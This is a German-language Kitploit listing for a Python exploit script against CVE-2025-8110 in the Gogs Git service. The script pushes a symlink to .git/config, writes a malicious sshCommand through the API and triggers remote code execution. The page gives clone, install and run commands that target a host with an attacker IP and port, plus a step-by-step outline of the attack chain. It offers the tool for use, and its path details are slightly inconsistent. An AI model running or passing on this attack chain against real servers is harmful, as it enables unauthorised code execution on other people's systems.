Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-8110-GOGS-RCE — GOGS-RCE-cve-2025-8110-Python-Skript, das die gesamte Angriffskette automatisiert: von der Erstellung eines Repositorys mit einer Symlink-Datei, die auf .git/config verweist, bis zum Auslösen von RCE über einen manipulierten sshCommand in der Config-Datei. | Kitploit
Tools/GitHubGitHub/kayl22/cve-2025-8110-gogs-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung
GitHubkayl22/cve-2025-8110-gogs-rce

cve-2025-8110-GOGS-RCE

GOGS-RCE-cve-2025-8110-Python-Skript, das die gesamte Angriffskette automatisiert: von der Erstellung eines Repositorys mit einer Symlink-Datei, die auf .git/config verweist, bis zum Auslösen von RCE über einen manipulierten sshCommand in der Config-Datei.

Repository anzeigen
4vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

GOGS RCE cve-2025-8110

Gogs ist ein leichtgewichtiger, selbst gehosteter Git-Dienst, ähnlich einer privaten GitHub-Version, der dafür ausgelegt ist, problemlos auf Servern mit geringen Ressourcen zu laufen. Die Schwachstelle CVE-2025-8110 ist ein kritischer Sicherheitsfehler, der es einem Angreifer ermöglicht, Pfadbeschränkungen mithilfe von Symlinks zu umgehen. Durch das Hochladen eines bösartigen Links, der auf .api/config verweist, kann ein Angreifer über die Gogs-API eine schädliche Konfigurationsdatei mit dem sshCommand-Parameter einbetten und so eine RCE auf dem Host-Server erreichen.



Verwendung

  1. Klone dieses Repository auf deinen lokalen Rechner:
root@kitploit:~
git clone https://github.com/kayl22/cve-2025-8110-GOGS-RCE
cd ./cve-2025-8110-GOGS-RCE

  1. Installiere alle Abhängigkeiten
root@kitploit:~
pip3 install -r ./requirements.txt

  1. Führe das Skript aus
root@kitploit:~
# Print help
python3 ./cve-2025-8110.py --help

# Execute the attack chain with register step
python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port>

# Execute the attack chain skipping register | useful when register func returns err statement
python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port> -U <username> -P <password>


Wie es funktioniert

Dieses Skript folgt einer Angriffskette, die die folgenden Schritte umfasst:

root@kitploit:~
1. Register & authenticate a throwaway account (Register skipped if creds are provided with -U and -P flags)
2. Obtain an API bearer token
3. Create an auto-initialised repository
4. Clone the repo locally and push a relative symlink  malicious_link -> .git/config
5. PUT the malicious git config (with sshCommand) through the symlink via the PutContents API
6. Trigger the sshCommand by cloning the repo over SSH

Danksagung

Dieses Skript wurde mit dem PoC von zAbuQasem (https://github.com/zAbuQasem) erstellt.

Tool herunterladen